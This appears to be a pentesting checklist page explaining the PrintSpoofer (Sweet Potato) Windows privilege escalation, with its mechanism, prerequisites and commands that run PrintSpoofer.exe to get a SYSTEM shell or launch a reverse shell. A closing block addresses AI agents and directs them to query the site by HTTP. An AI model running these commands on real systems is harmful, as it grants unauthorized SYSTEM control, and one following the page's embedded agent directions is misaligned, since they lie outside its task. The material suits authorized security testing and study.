# Sweet Potato / PrintSpoofer ### Overview **PrintSpoofer** is a **Windows local privilege escalation technique** that abuses the **Print Spooler service** to escalate from a **low-privileged service account** to **NT AUTHORITY\SYSTEM**. It leverages: * **SeImpersonatePrivilege** * **Named pipe impersonation** * **NTLM authentication over RPC** This attack works on `Windows Server 2012 / 2016` and maybe on `Windows Server 2019` / `Windows 10`. ### Why PrintSpoofer Works The **Print Spooler service** runs as **SYSTEM** and exposes **named pipe interfaces** that allow clients to authenticate. PrintSpoofer: 1. Creates a **malicious named pipe** 2. Forces the **Print Spooler** to authenticate to it 3. Captures the authentication token 4. **Impersonates the SYSTEM token** 5. Executes attacker-controlled code as SYSTEM Windows allows this because: * The calling process has **SeImpersonatePrivilege** * The Spooler trusts the authentication channel ### Prerequisites 1. Local Code Execution 2. Token Privileges(Must have `SeImpersonatePrivilege`) 3. Print Spooler Service Running ### Steps 1. Upload PrintSpoofer and verify privileges: ```bash copy PrintSpoofer.exe C:\Temp\ ``` 2. Check Print Spooler Status: ```bash sc query spooler ``` 3. Execute PrintSpoofer: ```bash # Execute command and interact with the new process in the current command prompt PrintSpoofer.exe -i -c cmd # Run a reverse shell and catch it. PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i ``` ### References 1. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/potato-attacks/sweet-potato-printspoofer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.